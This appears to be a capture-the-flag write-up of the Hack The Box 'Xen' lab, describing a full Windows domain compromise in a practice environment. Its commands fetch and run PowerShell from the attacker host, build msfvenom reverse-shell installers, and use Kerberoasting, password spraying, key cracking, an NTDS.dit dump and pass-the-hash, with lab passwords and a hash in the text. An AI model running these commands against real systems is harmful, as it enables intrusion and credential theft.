Image for post
Image for post

Network Experience:

My observations while working the targets:

Tools:

The recommended tools for this lab were:

Preface:

When I started working this challenge, I knew that I would be dealing with mostly Windows devices. So, my strategy was to compromise the initial foothold system and then use it to discover, attack, and compromise the rest of the network.

Enumeration:

Using Nmap, I saved the output while scanning for service version detection, OS detection, script scanning, and verbose mode of the target system.

Image for post
Image for post
Figure 1: Nmap Scan
Image for post
Image for post
Figure 2: Default Website
Image for post
Image for post
Figure 3: Default Website Source Code
gobuster dir — url https://humongousretail.com -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -o 10.13.38.12.gobuster -t 40 -k
Image for post
Image for post
Figure 4: gobuster Results
Image for post
Image for post
Figure 5: /remote Directory
Image for post
Image for post
Figure 6: Citrix Login Page
Image for post
Image for post
Figure 7: Telnet Session

Breach:

Based on the information that I gathered, I believed that the path to a foothold had to go through the Exchange server. However, I was at a loss of how to do that. So, I had to break down and review the official Xen walkthrough for assistance.

smtp-user-enum -M RCPT -U /usr/share/wordlists/wfuzz/general/megabeast.txt -D humongousretail.com -t 10.13.38.12
Image for post
Image for post
Figure 8: smtp-user-enum Results
Image for post
Image for post
Figure 9: Body.txt
Image for post
Image for post
Figure 10: SET Menu
Image for post
Image for post
Figure 11: SET IP & URL Data
Image for post
Image for post
Figure 12: Sent Email via swaks
Image for post
Image for post
Figure 13: SET Tool Results
Image for post
Image for post
Figure 14: Netcat Results
Image for post
Image for post
Figure 15: Citrix Logon
Image for post
Image for post
Figure 16: Authenticated Account
Image for post
Image for post
Figure 17: Launched Application
Image for post
Image for post
Figure 18: Windows Desktop
Image for post
Image for post
Figure 19: Flag Location

Deploy:

While enumerating the target, it became obvious that the compromised user’s environment was locked down. Not being able to access a Command Prompt nor PowerShell from the Start Menu, I decided to try to create a shortcut to launch a Command Prompt; which was successful.

Image for post
Image for post
Figure 20: CMD.EXE Shortcut
Image for post
Image for post
Figure 21: Executed Shortcut
iex (New-Object Net.WebClient).DownloadString(‘http://10.14.14.10/PowerUp.ps1');Invoke-AllChecks
Image for post
Image for post
Figure 22: PowerUp Found Abuse
Image for post
Image for post
Figure 23: Modified Invoke-PowerShellTcp.ps1
msfvenom -p windows/x64/exec CMD=”cmd /c powershell iex(new-object net.webclient).downloadstring(‘http://10.14.14.10/Invoke-RS.ps1')" -f msi > shell.msi
Image for post
Image for post
Figure 24: MSVenom MSI Payload
IEX (New-Object System.Net.WebClient).DownloadFile(‘http://10.14.14.10/shell.msi', ‘C:\\windows\\system32\\spool\\drivers\\color\\shell.msi’)
Image for post
Image for post
Figure 25: Uploaded shell.msi
Image for post
Image for post
Figure 26: Executed shell.msi
Image for post
Image for post
Figure 27: Reverse Shell (SYSTEM)
Image for post
Image for post
Figure 28: Flag Location

Ghost:

After obtaining SYSTEM on the target, I decided to return to the User’s Desktop so that I could enumerate the HTB.Local domain. I was able to identify that the compromised foothold target was a dual-honed system. Reviewing the Arp table provided me with some additional IP Addresses on the second network.

Image for post
Image for post
Figure 29: Dual-Honed Network
Image for post
Image for post
Figure 30: Network Arp
iex (New-Object Net.WebClient).DownloadString(‘http://10.14.14.10/PowerView.ps1');Get-NetComputer | ft samaccountname,cn,operatingsystem
Image for post
Image for post
Figure 31: Domain Computers
Image for post
Image for post
Figure 32: Host to IP Validation
net view \\172.16.249.201\ /allnet use \\172.16.249.201\Citrix$
Image for post
Image for post
Figure 33: Network Shares
iex (New-Object Net.WebClient).DownloadString(‘http://10.14.14.10/PowerView.ps1');get-netuser | ft samaccountname,admincount
Image for post
Image for post
Figure 34: Domain Users & Administrators
iex (New-Object Net.WebClient).DownloadString(‘http://10.14.14.10/Invoke-Kerberoast.ps1');Invoke-Kerberoast -OutputFormat hashcat
Image for post
Image for post
Figure 35: Kerberoastable User (mturner)
cat hash.out | tr -d ‘[:space:]’ > kerb.hashhashcat -m 13100 -a 0 -w 3 kerb.hash ~/wordlists/rockyou.txt -r /opt/hashcat/rules/OneRuleToRuleThemAll.rule
Image for post
Image for post
Figure 36: Cracked Hash
net use \\172.16.249.201\Citrix$ /user:htb.local\mturner ‘4install!’
Image for post
Image for post
Figure 37: Connect Share & Flag (mturner)

Camouflage:

Continuing to enumerate the share, I viewed the private.ppk; which appeared to be a Putty RSA Key. So, I copied the contents and saved it to my Attacker system.

Image for post
Image for post
Figure 38: Putty RSA Key
iex (New-Object Net.WebClient).DownloadString(‘http://10.14.14.10/Invoke-PortScan.ps1');Invoke-PortScan -StartAddress 172.16.249.200 -EndAddress 172.16.249.204 -ScanPort -Port 22
Image for post
Image for post
Figure 39: Portscan for TCP 22
IEX (New-Object System.Net.WebClient).DownloadFile(‘http://10.14.14.10/putty.exe', ‘C:\\windows\\system32\\spool\\drivers\\color\\putty.exe’)IEX (New-Object System.Net.WebClient).DownloadFile(‘http://10.14.14.10/private.ppk', ‘C:\\users\\pmorgan\\desktop\\private.ppk’)
Image for post
Image for post
Figure 40: Uploaded Files
Image for post
Image for post
Figure 41: Putty w/Auth
Image for post
Image for post
Figure 42: Initial Security Alert
Image for post
Image for post
Figure 43: Failed Authentication
iex (New-Object Net.WebClient).DownloadString(‘http://10.14.14.10/Invoke-PortScan.ps1');Invoke-PortScan -StartAddress 172.16.249.202 -EndAddress 172.16.249.202 -ScanPort -Port 80,443,8080
Image for post
Image for post
Figure 44: Port Scan
Image for post
Image for post
Figure 45: Default Web Site
Image for post
Image for post
Figure 46: Putty w/Passphrase
Image for post
Image for post
Figure 47: Converted Putty Key
putty2john private.ppk > putty.hashsudo gcc src/kwp.c -o kwpsudo ./kwp basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route -s 1 -o kb-pattern.lst
Image for post
Image for post
Figure 48: kwprocessor Wordlist Creation
john putty.hash -w /home/mbond/wordlists/kb-pattern.lst --format=PuTTY --pot=putty.out
Image for post
Image for post
Figure 49: JTR Session
Image for post
Image for post
Figure 50: Wordlist Pattern Contents
Image for post
Image for post
Figure 51: SSH Connection (nsroot)
Image for post
Image for post
Figure 52: Shell Connection (root)
tcpdump -w test.pcap -s0 -v
Image for post
Image for post
Figure 53: tcpdump Capture
Image for post
Image for post
Figure 54: Python HTTP Server
IEX (New-Object System.Net.WebClient).DownloadFile(‘http://172.16.249.202:9999/test.pcap', ‘C:\\windows\\system32\\spool\\drivers\\color\\test.pcap’)
sudo python3 /opt/impacket/examples/smbserver.py loot $(pwd) -smb2supportnet use \\10.14.14.10\lootcp *.pcap \\10.14.14.10\loot\.
Image for post
Image for post
Figure 55: SMBServer
Image for post
Image for post
Figure 56: SMBServer Share
Image for post
Image for post
Figure 57: Capture File (LDAP)
Image for post
Image for post
Figure 58: Credentials & Flag

Doppelgänger:

Reviewing my initial domain user enumeration, the netscaler-svc account did not appear to have any elevated privileges. So, I decided to use DomainPasswordSpary.ps1 to determine if there were any shared passwords amongst the domain users.

iex (New-Object Net.WebClient).DownloadString(‘http://10.14.14.10/DomainPasswordSpray.ps1');Invoke-DomainPasswordSpray -UserList user.lst -Password ‘#S3rvice#@cc’ -OutFile creds.txt
Image for post
Image for post
Figure 59: Successful Password Spraying
iex (New-Object Net.WebClient).DownloadString(‘http://10.14.14.10/Invoke-PortScan.ps1');Invoke-PortScan -StartAddress 172.16.249.200 -EndAddress 172.16.249.204 -ScanPort -Port 3389,5985,5986
Image for post
Image for post
Figure 60: Port Scan
$user = ‘HTB.LOCAL\backup-svc’
$pass = ConvertTo-SecureString ‘#S3rvice#@cc’ -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ($user, $pass)
$sess = New-PSSession -ComputerName DC -Credential $cred
Image for post
Image for post
Figure 61: Created Variables
Enter-PSSession $sess
Image for post
Image for post
Figure 62: Established Remote Session (backup-svc)
Image for post
Image for post
Figure 63: Flag Location

Owned:

Connected to the DC, I decided it seemed that I did not have DA access. So, I issued a whoami /priv to determine privileges for the backup-svc account.

Image for post
Image for post
Figure 64: Backup & Restore Privileges
$file=@’
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec “C:\\Users\\backup-svc\\Documents\\shadowcopy.cmd”
delete shadows volume %someAlias%
reset
exit
’@
$file | Out-File -FilePath C:\Users\backup-svc\Documents\shadow.txt$file=@’
cmd.exe /c robocopy /B z:\windows\ntds\ C:\Users\backup-svc\Documents\ ntds.dit
’@
$file | Out-File -FilePath C:\Users\backup-svc\Documents\shadowcopy.cmd
diskshadow /s shadow.txt /l log.txt
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.14.14.10 LPORT=443 -f msi > shell.msi
IEX (New-Object System.Net.WebClient).DownloadFile(‘http://10.14.14.10/shell.msi', ‘C:\\windows\\system32\\spool\\drivers\\color\\shell.msi’)
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 443
set exitonsession false
exploit -j
route add 172.16.249.0/24 1use auxiliary/server/socks4a
set srvport 9050
run
proxychains evil-winrm -i 172.16.249.200 -u backup-svc -p ‘#S3rvice#@cc’
unix2dos shadowcopy.cmdunix2dos shadow.txt
diskshadow /s shadow.txt /l log.txt
Image for post
Image for post
Figure 65: Truncated Diskshadow Output (1 of 2)
Image for post
Image for post
Figure 66: Truncated Diskshadow Output (2 of 2)
reg.exe save HKLM\SYSTEM system.hive
impacket-secretsdump -ntds ntds.dit -system system.hive -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
Image for post
Image for post
Figure 67: Extracted NTDS.dit Hashes
proxychains evil-winrm -i 172.16.249.200 -u administrator -H 822601ccd7155f47cd955b94af1558be
Image for post
Image for post
Figure 68: Evil-WinRM Session (Administrator)
Image for post
Image for post
Figure 69: Flag Location

References:

https://docs.microsoft.com/en-us/Exchange/mail-flow/test-smtp-with-telnet?view=exchserver-2019

Disclaimer:

This article is made available for educational purposes only!!! In addition, this article provides general information on cyber security topics used for “Ethical Hacking”.

Cyber Security Enthusiast

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store